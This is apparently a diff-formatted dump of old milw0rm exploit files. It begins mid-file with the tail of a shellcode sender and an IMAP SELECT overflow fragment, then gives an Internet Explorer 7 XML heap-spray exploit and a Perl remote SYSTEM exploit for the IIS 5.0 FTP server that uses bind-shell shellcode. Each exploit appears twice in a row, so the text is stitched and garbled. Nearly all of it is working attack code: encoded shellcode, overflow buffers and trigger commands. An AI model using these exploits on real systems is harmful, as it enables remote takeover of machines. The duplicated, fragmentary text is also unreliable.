"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b"
"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b"
"\x4f\x6b\x66\x79\x6f\x58\x50\x68")
buffer+="\r\n\r\n"
expl.send (buffer)
expl.close()
print "[+] Payload Sent, ph33r."
# milw0rm.com [2007-12-12]


@ -42,6 +42,6 @@ sleep(3)
s.send('A001 SELECT ' + buffer+'\r\n')
data = s.recv(1024)
s.close()
print "\nDone! "
# milw0rm.com [2004-11-29]
print "\nDone! "
# milw0rm.com [2004-11-29]


@ -1,55 +1,55 @@
<html>
<script>
// k`sOSe 12/10/2008
// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
// Heap spray address adjusted for Vista - muts / offensive-security.com
// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
// http://www.offensive-security.com/0day/iesploit-vista.rar
// windows/exec - 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var block = unescape("%u0c0c%u0c0c");
var nops = unescape("%u9090%u9090%u9090");
while (block.length < 81920) block += block;
var memory = new Array();
var i=0;
for (;i<1000;i++) memory[i] += (block + nops + shellcode);
document.write("<iframe src=\"iframe.html\">");
</script>
</html>
<!-- iframe.html
<XML ID=I>
<X>
<C>
<![CDATA[
<image
SRC=http://&#3084;&#3084;.xxxxx.org
>
]]>
</C>
</X>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>
</SPAN>
-->
# milw0rm.com [2008-12-10]
<html>
<script>
// k`sOSe 12/10/2008
// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
// Heap spray address adjusted for Vista - muts / offensive-security.com
// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
// http://www.offensive-security.com/0day/iesploit-vista.rar
// windows/exec - 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var block = unescape("%u0c0c%u0c0c");
var nops = unescape("%u9090%u9090%u9090");
while (block.length < 81920) block += block;
var memory = new Array();
var i=0;
for (;i<1000;i++) memory[i] += (block + nops + shellcode);
document.write("<iframe src=\"iframe.html\">");
</script>
</html>
<!-- iframe.html
<XML ID=I>
<X>
<C>
<![CDATA[
<image
SRC=http://&#3084;&#3084;.xxxxx.org
>
]]>
</C>
</X>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>
</SPAN>
-->
# milw0rm.com [2008-12-10]


@ -1,144 +1,144 @@
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope
# milw0rm.com [2009-09-01]
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope
# milw0rm.com [2009-09-01]